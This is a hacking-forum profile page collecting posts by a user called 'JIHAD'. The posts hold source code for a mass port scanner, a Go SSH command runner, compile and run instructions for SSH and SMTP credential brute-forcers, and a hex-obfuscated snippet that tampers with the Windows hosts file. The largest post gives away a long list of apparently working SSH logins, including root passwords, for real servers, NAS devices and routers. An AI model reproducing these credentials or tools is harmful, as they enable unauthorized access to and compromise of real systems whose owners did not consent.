-
Posts
134 -
Joined
-
Last visited
-
Days Won
1
Everything posted by JIHAD
-
Inceteaza sa mai folosesti cuvinte inventate: "haceri" samd. Este pur si simplu cocalaresc. Daca vrei sa faci o cariera din hacking, sys admin(ziceai ca stii linux) sau programator(ziceai ca stii si limbaje de programare) important este sa scrii si sa vorbesti corect. Prima etapa intr-o cariera este interviul. Succes la spart site-uri guvernamentale.
-
n-am avut probleme, mi-a mers normal.
-
tot mai buna e formula w32dasm + hview + olly
-
Scuza-ma ca-ti zic, dar esti prost raaaaaaaau.
-
f misto, dar poate ar fi mai bine sa folosesti rounded corners.
-
$array =array("php","html","perl","pl","exe","py","js","css","xml","PHP"); daca creez 3 fisiere cu extensia php, PHP, phP root@superstars:~/Downloads/gigi# ls test.php test.phP test.PHP Foloseste strtolower si pe extensii in felul asta nu va trebui sa bagi in array php PHP pHP pHp etc, altfel va trebui ca array-ul cu extensii sa contina toate variantele. $array =array("php","html","perl","pl","exe","py","js","css","xml"); if(strtolower(pathinfo($_POST['file'],PATHINFO_EXTENSION)) == $line) N-am verificat exact codul. Dar asa ar trebui sa fie. Sper ca intelegi ce vreau sa zic.
-
Nu vrei sa scanez eu in locul tau? Doar sa-ti trimit pe mail...
-
Prietene, site-ul ala a copiat d-aici, postul pe RTS e facut pe data de: 01-09-2014 14/30/11 adica: 30 noiembrie 2014 Trebuia sa apara si un cacanar care crede ca anul are 14 luni...
-
n-are rost. oricum ms ptr. implicare.
-
Am bagat doar varianta de 32. Ar trebui sa mearga pe majoritatea systemelor de 64. Cum ziceam, l-am testat pe mai multe sisteme si de 32 si 64 si acum merge teava.
-
il descarci din nou de pe noul link, si comanda este ./start ip.ip
-
am reeditat post-ul initial Hubba. Daca poti incerca acum. Mie imi merge. L-am testat pe mai multe sisteme.
-
root@superstars:~/smtp/final# ./start 5.9 JIHAD FROM BU OWN THIS SHIT! [-] Searching: 5.9.255.* on port: 25 [Found: 11268] [100.0% Done] [!] Scanning complete In 155 Seconds. [We got 11343 ips] [*] Trying: john:john on found ips [*] OK : john:john 5.9.53.15 Fisiere separate ptr. users and passwords. Se pot specifica editand fisierul start. GirlShare - Download final-smtp.tgz se porneste cu ./start ip.ip Reuploadati-l voi daca considerati ca este necesar. Astept feedback. JIHAD!
-
rdesktop | SourceForge.net poate te reapuci de el
-
Pai un incepator in loc sa dea ./a ip.ip mai bine ar invata treburi elementare, sursa a fost postata la programare, nu ca arhiva. Vba aia, daca esti prost, stai acasa.
-
Comanda de compilare static. gcc -o brute jihad.c -I /usr/local/include/ -L /usr/local/lib/ -static -lssh2 -lssl -lcrypto -ldl -lz -lpthread
-
ma bucur cand vad ca mai scrie cineva si cate o rezolvare, nu doar intrebari. bv.
-
am dat sursa, merge, e ok, restul va descurcati si singuri.
-
package main import ( "bytes" "fmt" "code.google.com/p/go.crypto/ssh" "os" ) func main() { config := &ssh.ClientConfig{ User: os.Args[3], Auth: []ssh.AuthMethod{ ssh.Password(os.Args[4]), }, } client, err := ssh.Dial("tcp", os.Args[1] + ":" + os.Args[2], config) if err != nil { panic("Failed to dial: " + err.Error()) } session, err := client.NewSession() if err != nil { panic("Failed to create session: " + err.Error()) } defer session.Close() var b bytes.Buffer session.Stdout = &b if err := session.Run(os.Args[5]); err != nil { panic("Failed to run: " + err.Error()) } fmt.Println(b.String()) } compile and execute: ssh.exe ip port user password "command"
-
Salut, lucrez la un proiect now, un port scanner + brute pe diferite protocoale, ftp, ssh, smtp. Scanner va fi ptr. windows. Un exemplu gasiti in poza atasata. Astept sugestii ..
-
mersi de sugestii ganav. scopul este sa invatam, nu sa inlocuim programe
-
aceasta este varianta demonstrativa. n-am stat sa ma chinui f. mult. astept sugestii. // pscan2.c ported on Windows // JIHAD OWNS YOU // just for demo purposes // you might wanna check thread waiting before showing the final result // enjoy! #include "stdafx.h" #include <winsock2.h> #include <sys/types.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <stdio.h> #include <ctype.h> #include <time.h> #include <windows.h> #include <process.h> #include <string.h> #include <ws2tcpip.h> #define MAX_SOCKETS 1000 #define TIMEOUT 3 #define S_NONE 0 #define S_CONNECTING 1 WSADATA WsaDat; struct conn_t { SOCKET s; char status; struct sockaddr_in addr; }; struct conn_t connlist[MAX_SOCKETS]; void init_sockets(void); void check_sockets(void); void fatal(char *); FILE *outfd; int tot = 0; int main(int argc, char *argv[]) { if (WSAStartup(MAKEWORD(2, 2), &WsaDat) != 0){ return 0; } int done = 0, i, cip = 1, bb = 0, ret, k, ns, x; time_t scantime; char ip[20], outfile[128], last[256]; if (argc < 3) { printf("Usage: %s <b-block> <port>\n", argv[0]); exit(EXIT_FAILURE); } memset(&outfile, 0, sizeof(outfile)); if (argc == 3) sprintf_s(outfile, sizeof(outfile)-1, "scan.log", argv[1], argv[2]); if (!(outfd = fopen(outfile, "a"))) { perror(outfile); exit(EXIT_FAILURE); } printf("# scanning: ", argv[1]); fflush(stdout); memset(&last, 0, sizeof(last)); init_sockets(); scantime = time(0); while (!done) { for (i = 0; i < MAX_SOCKETS; i++) { if (cip == 255) { if ((bb == 255) || (argc >= 4)) { ns = 0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) { ns++; break; } } if (ns == 0) done = 1; break; } else { cip = 0; bb++; for (x = 0; x < strlen(last); x++) putchar('\b'); memset(&last, 0, sizeof(last)); sprintf_s(last, sizeof(last)-1, "%s.%d.* (total: %d) (%.1f%% done)", argv[1], bb, tot, (bb / 255.0) * 100); printf("%s", last); fflush(stdout); } } if (connlist[i].status == S_NONE) { connlist[i].s = socket(AF_INET, SOCK_STREAM, 0); if (connlist[i].s == -1) printf("Unable to allocate socket.\n"); else { memset(&ip, 0, 20); sprintf(ip, "%s.%d.%d", argv[1], bb, cip); connlist[i].addr.sin_addr.s_addr = inet_addr(ip); if (connlist[i].addr.sin_addr.s_addr == -1) fatal("Invalid IP."); connlist[i].addr.sin_family = AF_INET; connlist[i].addr.sin_port = htons(atoi(argv[2])); connlist[i].status = S_CONNECTING; cip++; } } } check_sockets(); } printf("\n# pscan completed in %u seconds. (found %d ips)\n", (time(0) - scantime), tot); fclose(outfd); WSACleanup(); printf("\n# Press any key to exit\n"); getchar(); // you might want to remove this... exit(EXIT_SUCCESS); } void init_sockets(void) { int i; for (i = 0; i < MAX_SOCKETS; i++) { connlist[i].status = S_NONE; memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in)); } return; } typedef struct { int i; }t; void pck(void *param){ int ret; struct timeval timeout; timeout.tv_sec = 3; timeout.tv_usec = 0; t *args = (t*)param; int i = args->i; setsockopt(connlist[i].s, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)); setsockopt(connlist[i].s, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)); if (connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr, sizeof(struct sockaddr_in)) != SOCKET_ERROR){ tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); closesocket(connlist[i].s); connlist[i].status = S_NONE; } else { closesocket(connlist[i].s); (connlist[i].s); connlist[i].status = S_NONE; } } void check_sockets(void) { int i, ret; t *arg; arg = (t *)malloc(sizeof(t)); for (i = 0; i < MAX_SOCKETS; i++) { if (connlist[i].status == S_CONNECTING) { arg->i = i; _beginthread(pck, 0, (void*)arg); } } } void fatal(char *err) { int i; printf("Error: %s\n", err); for (i = 0; i < MAX_SOCKETS; i++) if (connlist[i].status >= S_CONNECTING) closesocket(connlist[i].s); fclose(outfd); exit(EXIT_FAILURE); }
-
merge de rupe, in ce dai nu mai merge. ) functia de ddos e aici with open("633a5c57494e444f57535c73797374656d33325c647269766572735c6574635c686f737473".decode("hex"), "a") as Killer: Killer.write("\n127.0.0.1\t" + str(died_site)) Killer.close()
-
Free alex:alex@123 187.59.85.29 port: 22 --> Linux valmor 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Pentium(R) Dual-Core CPU E5300 @ 2.60GHz GenuineIntel GNU/Linux alex:alex 177.87.108.4 port: 22 --> Linux svr-globo 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux daniel:12345 200.195.42.71 port: 22 --> Linux SRVPPGEE 2.6.32-431.17.1.el6.x86_64 #1 SMP Wed May 7 23:32:49 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux daniel:daniel 158.49.96.40 port: 22 --> Linux forja-gea 3.2.0-4-686-pae #1 SMP Debian 3.2.60-1+deb7u3 i686 GNU/Linux david:david 186.5.7.98 port: 22 --> Linux impedi 2.6.18-371.4.1.el5PAE #1 SMP Thu Jan 30 06:51:58 EST 2014 i686 i686 i386 GNU/Linux david:david 190.121.161.98 port: 22 --> Linux svr-Amadeus 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux demo:demo123 89.21.29.39 port: 22 --> Linux mkg 2.6.32-71.el6.i686 #1 SMP Wed Sep 1 01:26:34 EDT 2010 i686 i686 i386 GNU/Linux demo:demo 141.138.139.97 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux demo:demo 141.138.139.98 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux ftpuser:ftpuser 119.10.27.30 port: 22 --> Linux ZWCN2003--8024 2.6.32-431.23.3.el6.x86_64 #1 SMP Thu Jul 31 17:20:51 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux ftpuser:ftpuser 119.10.27.71 port: 22 --> Linux ZWCN2003--8071 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux ftpuser:ftpuser 180.148.1.173 port: 22 --> Linux thuctap.vntt 2.6.32-431.23.3.el6.x86_64 #1 SMP Thu Jul 31 17:20:51 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux ftpuser:ftpuser 190.76.48.125 port: 22 --> Linux ns1 2.6.32-5-686 #1 SMP Tue Mar 8 21:36:00 UTC 2011 i686 GNU/Linux git:git 183.37.138.151 port: 22 --> Linux zrfubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux git:q1w2e3r4 123.114.37.105 port: 22 --> Linux Ubuntu 3.13.0-34-generic #60-Ubuntu SMP Wed Aug 13 15:45:27 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux guest:guest 108.65.58.18 port: 22 --> Linux edNAS 3.2.40 #4493 SMP Thu Aug 21 21:46:06 CST 2014 x86_64 GNU/Linux synology_cedarview_412+ guest:guest 111.93.42.3 port: 22 --> Linux JKKIWIPLAN 2.6.32-431.11.2.el6.x86_64 #1 SMP Mon Mar 3 13:32:45 EST 2014 x86_64 x86_64 x86_64 GNU/Linux guest:guest 1.182.9.52 port: 22 --> Linux DiskStation 3.2.40 #8 SMP Sat Apr 5 10:56:54 CST 2014 x86_64 GNU/Linux synology_bromolow_3612xs guest:guest 120.105.2.57 port: 22 --> Linux hostname851566 2.6.32.2NS6700 #33 SMP Wed Feb 8 15:43:57 CST 2012 i686 GNU/Linux guest:guest123 140.118.2.83 port: 22 --> Linux DiskStation 2.6.32.12 #2228 SMP Thu May 10 02:32:57 CST 2012 x86_64 GNU/Linux synology_cedarview_1812+ guest:guest 140.114.94.101 port: 22 --> Linux aurora 2.6.29.4-167.fc11.x86_64 #1 SMP Wed May 27 17:27:08 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux guest:guest 166.140.76.158 port: 22 --> Linux Fullerton-DSP-700 2.4.32 #1 Tue Sep 1 13:52:46 EDT 2009 i486 unknown guest:guest 166.140.76.159 port: 22 --> Linux Santa-Ana-DSP-700 2.4.32 #1 Tue Sep 1 13:52:46 EDT 2009 i486 unknown guest:guest 166.141.14.122 port: 22 --> Linux VZW-COLUMBIA-PRYSMIAN 2.4.32 #1 Wed Feb 18 11:10:23 EST 2009 i486 unknown guest:guest 166.141.16.67 port: 22 --> Linux RPTR-BURTONWELLS-BEAUFORT 2.4.32 #1 Wed Feb 18 11:10:23 EST 2009 i486 unknown guest:guest 166.142.139.129 port: 22 --> Linux csi-dsp2-dualband 2.4.32 #1 Wed Feb 18 11:10:23 EST 2009 i486 unknown guest:guest 166.142.139.134 port: 22 --> Linux csi-dsp2-dualband 2.4.32 #1 Wed Feb 18 11:10:23 EST 2009 i486 unknown guest:guest 166.142.140.5 port: 22 --> Linux csi-dsp2-dualband 2.4.32 #1 Wed Feb 18 11:10:23 EST 2009 i486 unknown guest:guest 166.156.153.104 port: 22 --> Linux csi-dsp2-dualband 2.4.32 #1 Wed Feb 18 11:10:23 EST 2009 i486 unknown guest:guest 166.161.32.48 port: 22 --> Linux COL-Columbia-Aiport-Rptr 2.4.32 #1 Wed Feb 18 11:10:23 EST 2009 i486 unknown guest:guest 178.83.34.47 port: 22 --> Linux Nas 3.2.30 #3211 SMP Tue Apr 16 20:05:21 CST 2013 x86_64 GNU/Linux synology_x86_710+ guest:guest 189.152.48.125 port: 22 --> Linux NAS8D71D9 3.4.6 #1 SMP Fri Jul 26 06:24:29 CST 2013 i686 GNU/Linux guest:guest 211.44.9.202 port: 22 --> Linux DiskStation 3.2.40 #3810 SMP Sat Nov 9 11:54:42 CST 2013 x86_64 GNU/Linux synology_cedarview_713+ guest:guest 212.73.172.16 port: 22 --> Linux doombox 3.4.6 #1 SMP Thu Jun 12 01:42:47 CST 2014 x86_64 GNU/Linux guest:guest 81.56.46.53 port: 22 --> Linux popoNAS 3.2.40 #4493 SMP Wed Jul 9 21:14:19 CST 2014 x86_64 GNU/Linux synology_cedarview_412+ guest:guest 89.13.21.45 port: 22 --> Linux NAS01 3.4.6 #1 SMP Thu Jun 12 17:15:43 CST 2014 x86_64 unknown guest:guest 90.46.42.38 port: 22 --> Linux Arwen 3.2.40 #4493 SMP Thu Aug 21 21:46:06 CST 2014 x86_64 GNU/Linux synology_cedarview_1513+ guest:guest 95.72.57.55 port: 22 --> Linux forth 3.13.0-35-generic #62-Ubuntu SMP Fri Aug 15 01:58:01 UTC 2014 i686 i686 i686 GNU/Linux jack:jack 122.10.87.56 port: 22 --> Linux localhost 2.6.32-431.el6.i686 #1 SMP Fri Nov 22 00:26:36 UTC 2013 i686 i686 i386 GNU/Linux john:john 142.104.68.131 port: 22 --> Linux cengiz 3.2.0-54-generic #82-Ubuntu SMP Tue Sep 10 20:08:42 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux mike:mike123 184.72.37.38 port: 22 --> Linux ip-10-172-186-225 3.2.0-63-virtual #95-Ubuntu SMP Thu May 15 23:24:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux mysql:mysql 141.138.139.97 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux mysql:mysql 141.138.139.98 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux mysql:mysql 180.96.19.113 port: 22 --> Linux wgrydb 2.6.18-164.el5xen #1 SMP Tue Aug 18 15:59:52 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux mysql:mysql 190.8.37.104 port: 22 --> Linux enriquillo 2.6.18-164.15.1.el5 #1 SMP Wed Mar 17 11:30:06 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux mysql:mysql 203.195.162.23 port: 22 --> Linux VM_39_175_centos 2.6.32-431.23.3.el6.centos.plus.x86_64 #1 SMP Wed Jul 30 00:12:13 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux mysql:qwer1234 211.32.45.202 port: 22 --> Linux localhost.localdomain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux nagios:nagios 141.138.139.97 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux nagios:nagios 141.138.139.98 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux nagios:nagios 200.29.133.90 port: 22 --> Linux localhost.localdomain 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux nagios:nagios 209.123.2.199 port: 22 --> Linux nagios.tlrnj.local 2.6.32-431.23.3.el6.x86_64 #1 SMP Thu Jul 31 17:20:51 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux nagios:nagios 212.129.42.201 port: 22 --> Linux supervision2014 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64 GNU/Linux nagios:nagios 78.46.75.39 port: 22 --> Linux www3 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux oracle:oracle 103.17.69.50 port: 22 --> Linux ISTELAR-50 2.6.32-131.0.15.el6.x86_64 #1 SMP Tue May 10 15:42:40 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux oracle:oracle 116.112.15.67 port: 22 --> Linux app3.com 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux oracle:oracle 117.89.57.4 port: 22 --> Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux oracle:oracle123 125.20.39.46 port: 22 --> Linux 6HHHT12.BHARTI.MOB 2.6.32-279.el6.x86_64 #1 SMP Wed Jun 13 18:24:36 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux oracle:oracle 141.138.139.97 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux oracle:oracle 141.138.139.98 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux oracle:oracle 177.153.6.97 port: 22 --> Linux cpro22715 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux oracle:oracle 186.69.149.99 port: 22 --> Linux bebe 3.2.0-64-generic #97-Ubuntu SMP Wed Jun 4 22:04:21 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux oracle:oracle 202.79.19.42 port: 22 --> Linux localhost.localdomain 2.6.18-274.el5 #1 SMP Fri Jul 8 17:36:59 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux oracle:oracle 203.195.139.169 port: 22 --> Linux dbserver01 2.6.32-431.23.3.el6.centos.plus.x86_64 #1 SMP Wed Jul 30 00:12:13 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux oracle:oracle 218.28.152.162 port: 22 --> Linux halylogin 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:43 EDT 2010 i686 i686 i386 GNU/Linux oracle:oracle 221.192.132.174 port: 22 --> Linux localhost.localhost 2.6.32-71.el6.x86_64 #1 SMP Wed Sep 1 01:33:01 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux postgres:1234 1.179.145.52 port: 22 --> Linux MedicareServer 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux postgres:postgres 101.50.3.72 port: 22 --> Linux onespiritmap 2.6.32-042stab092.3 #1 SMP Sun Jul 20 13:27:24 MSK 2014 x86_64 x86_64 x86_64 GNU/Linux postgres:postgres 141.138.139.97 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux postgres:postgres 141.138.139.98 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux postgres:postgres 201.166.155.60 port: 22 --> Linux jim-OptiPlex-790 3.13.0-34-generic #60-Ubuntu SMP Wed Aug 13 15:45:27 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux postgres:postgres 202.119.201.172 port: 22 --> Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux postgres:postgres 69.64.46.19 port: 22 --> Linux dragon077 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64 GNU/Linux public:12345 178.37.177.77 port: 22 --> Linux NAS1 3.2.0-4-686-pae #1 SMP Debian 3.2.41-2 i686 GNU/Linux root:1q2w3e 128.8.117.44 port: 22 --> Linux localhost 2.6.18-164.15.1.el5.028stab068.9 #1 SMP Tue Mar 30 19:23:24 MSD 2010 i686 i686 i386 GNU/Linux root:root 111.73.46.70 port: 22 --> Linux localhost 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux root:root 112.101.80.100 port: 22 --> Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux root:root 141.138.139.97 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux root:root 141.138.139.98 port: 22 --> Linux mail 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux root:root 159.8.17.34 port: 22 --> Linux KPSL1 3.3.7 #10 SMP Tue Oct 22 11:20:41 BST 2013 x86_64 x86_64 x86_64 GNU/Linux root:root 176.57.119.128 port: 22 --> Linux Server-Debian 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64 GNU/Linux root:root 186.5.55.134 port: 22 --> Linux srvproxy 2.6.32-5-686 #1 SMP Tue May 13 16:33:32 UTC 2014 i686 GNU/Linux student:student 103.16.12.92 port: 22 --> Linux localhost.localdomain 2.6.18-164.el5xen #1 SMP Tue Aug 18 16:06:30 EDT 2009 i686 i686 i386 GNU/Linux student:student 150.55.48.51 port: 22 --> Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.60-1+deb7u3 i686 GNU/Linux student:student 210.86.128.197 port: 22 --> Linux faculty 2.6.32-431.23.3.el6.i686 #1 SMP Thu Jul 31 14:37:53 UTC 2014 i686 i686 i386 GNU/Linux test:1 177.73.32.131 port: 22 --> Linux ns2 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux test:1234 210.107.64.132 port: 22 --> Linux inctechnology.co.kr 2.6.18-308.el5 #1 SMP Fri Jan 27 17:17:51 EST 2012 x86_64 x86_64 x86_64 GNU/Linux test:test 111.93.42.3 port: 22 --> Linux JKKIWIPLAN 2.6.32-431.11.2.el6.x86_64 #1 SMP Mon Mar 3 13:32:45 EST 2014 x86_64 x86_64 x86_64 GNU/Linux test:test 1.179.175.58 port: 22 --> Linux CKW-WEB-1 2.6.32-38-server #83-Ubuntu SMP Wed Jan 4 11:26:59 UTC 2012 x86_64 GNU/Linux test:test 148.100.32.86 port: 22 --> Linux TFTools 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux test:test 222.128.11.96 port: 22 --> Linux ubuntu 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed Aug 14 16:19:23 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux test:test 50.16.24.10 port: 22 --> Linux ip-10-45-180-233 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux test:test 62.4.25.33 port: 22 --> Linux play 2.6.32-042stab092.3 #1 SMP Mon Aug 11 18:47:39 MSK 2014 x86_64 x86_64 x86_64 GNU/Linux test:test 62.4.25.33 port: 22 --> Linux play 2.6.32-042stab092.3 #1 SMP Sun Jul 20 13:27:24 MSK 2014 x86_64 x86_64 x86_64 GNU/Linux test:test 66.37.33.47 port: 22 --> Linux backups.buppbx.com 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux ubuntu:q1w2e3r4 123.114.37.105 port: 22 --> Linux Ubuntu 3.13.0-34-generic #60-Ubuntu SMP Wed Aug 13 15:45:27 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux ubuntu:ubuntu 130.89.51.66 port: 22 --> Linux cookbook 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux ubuntu:ubuntu 161.53.131.79 port: 22 --> Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux ubuntu:ubuntu 210.93.56.90 port: 22 --> Linux kpu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux ubuntu:ubuntu 87.79.8.54 port: 22 --> Linux ubuntu 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux user:12345 201.83.155.53 port: 22 --> Linux SRV-LINUX 2.6.32-5-686 #1 SMP Sun Sep 23 09:49:36 UTC 2012 i686 GNU/Linux user:user 116.68.90.8 port: 22 --> Linux user-desktop 2.6.32-39-generic #86-Ubuntu SMP Mon Feb 13 21:47:32 UTC 2012 i686 GNU/Linux user:user 120.105.2.57 port: 22 --> Linux hostname851566 2.6.32.2NS6700 #33 SMP Wed Feb 8 15:43:57 CST 2012 i686 GNU/Linux user:user 178.124.144.79 port: 22 --> Linux Gateway 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed Aug 14 16:19:23 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux user:user 178.62.153.90 port: 22 --> Linux myvpn 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux user:user 195.128.146.31 port: 22 --> Linux tactile 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64 GNU/Linux user:user 200.168.33.19 port: 22 --> Linux firewall 3.2.0-4-686-pae #1 SMP Debian 3.2.60-1+deb7u3 i686 GNU/Linux user:user 202.119.201.172 port: 22 --> Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux View AIX: alan:alan 196.38.164.176 port: 22 --> AIX mfreight 3 5 0003D685D600 mike:mike 196.38.164.176 port: 22 --> AIX mfreight 3 5 0003D685D600 oracle:oracle 121.22.102.34 port: 22 --> AIX dbserver1 1 6 00F864744C00 root:root 220.83.20.147 port: 22 --> AIX dytmc 1 6 00F8FB194C00 test:test 218.95.4.144 port: 22 --> AIX p01biapp01 1 6 00F85F274C00 ------------------ View HP: test:test 222.74.126.50 port: 22 --> HP-UX radius4 B.11.31 U ia64 2651823982 unlimited-user license ------------------ View BSD: guest:guest 118.43.62.98 port: 22 --> FreeBSD freenas.local 9.2-RELEASE-p10 FreeBSD 9.2-RELEASE-p10 #0 r262572+4fb5adc: Wed Aug 6 17:07:16 PDT 2014 root@build3.ixsystems.com:/fusion/jkh/921/freenas/os-base/amd64/fusion/jkh/921/freenas/FreeBSD/src/sys/FREENAS.amd64 amd64 mysql:mysql 59.46.33.10 port: 22 --> FreeBSD TopApp-6000(TopApp-61128-NLB) 8.0-RELEASE FreeBSD 8.0-RELEASE #7 r618M: Tue Sep 2 13:59:08 UTC 2014 root@ipass3000V4:/usr/src.newcmd/sys/amd64/compile/SERVER.1600.ipfw amd64 root:1 118.43.62.98 port: 22 --> FreeBSD freenas.local 9.2-RELEASE-p10 FreeBSD 9.2-RELEASE-p10 #0 r262572+4fb5adc: Wed Aug 6 17:07:16 PDT 2014 root@build3.ixsystems.com:/fusion/jkh/921/freenas/os-base/amd64/fusion/jkh/921/freenas/FreeBSD/src/sys/FREENAS.amd64 amd64 test:test1234 97.88.24.19 port: 22 --> FreeBSD freenas.meunier.lan 9.2-RELEASE-p4 FreeBSD 9.2-RELEASE-p4 #0 r262572+17a4d3d: Wed Apr 23 10:09:38 PDT 2014 root@build3.ixsystems.com:/tank/home/jkh/build/9.2.1/freenas/os-base/amd64/fusion/jkh/9.2.1/freenas/FreeBSD/src/sys/FREENAS.amd64 amd64 test:test 202.62.104.8 port: 22 --> FreeBSD latm.latm.la 8.3-RELEASE-p11 FreeBSD 8.3-RELEASE-p11 #0: Wed Sep 11 18:51:23 EDT 2013 root@snapshots-8_3-amd64.builders.pfsense.org:/usr/obj.pfSense/usr/pfSensesrc/src/sys/pfSense_SMP.8 amd64 www:www 150.59.38.50 port: 22 --> FreeBSD image3 5.2.1-RELEASE FreeBSD 5.2.1-RELEASE #0: Thu Jul 29 09:57:02 JST 2004 root@image3.is.tokushima-u.ac.jp:/usr/src/sys/i386/compile/IMAGE3 i386 View JUNOS: root:root123 178.152.3.100 port: 22 --> JUNOS AFJSOUQ 11.4R9.4 JUNOS 11.4R9.4 #0: 2013-08-22 06:58:13 UTC builder@singlath:/volume/build/junos/11.4/release/11.4R9.4/obj-octeon/bsd/kernels/JSRXNLE/kernel octeon root:root123 182.73.42.66 port: 22 --> JUNOS DELHI-JNPR-SRX-RTR 11.4R7.5 JUNOS 11.4R7.5 #0: 2013-03-01 11:40:03 UTC builder@evenath.juniper.net:/volume/build/junos/11.4/release/11.4R7.5/obj-octeon/bsd/kernels/JSRXNLE/kernel octeon root:root123 222.29.217.1 port: 22 --> JUNOS Data-8208 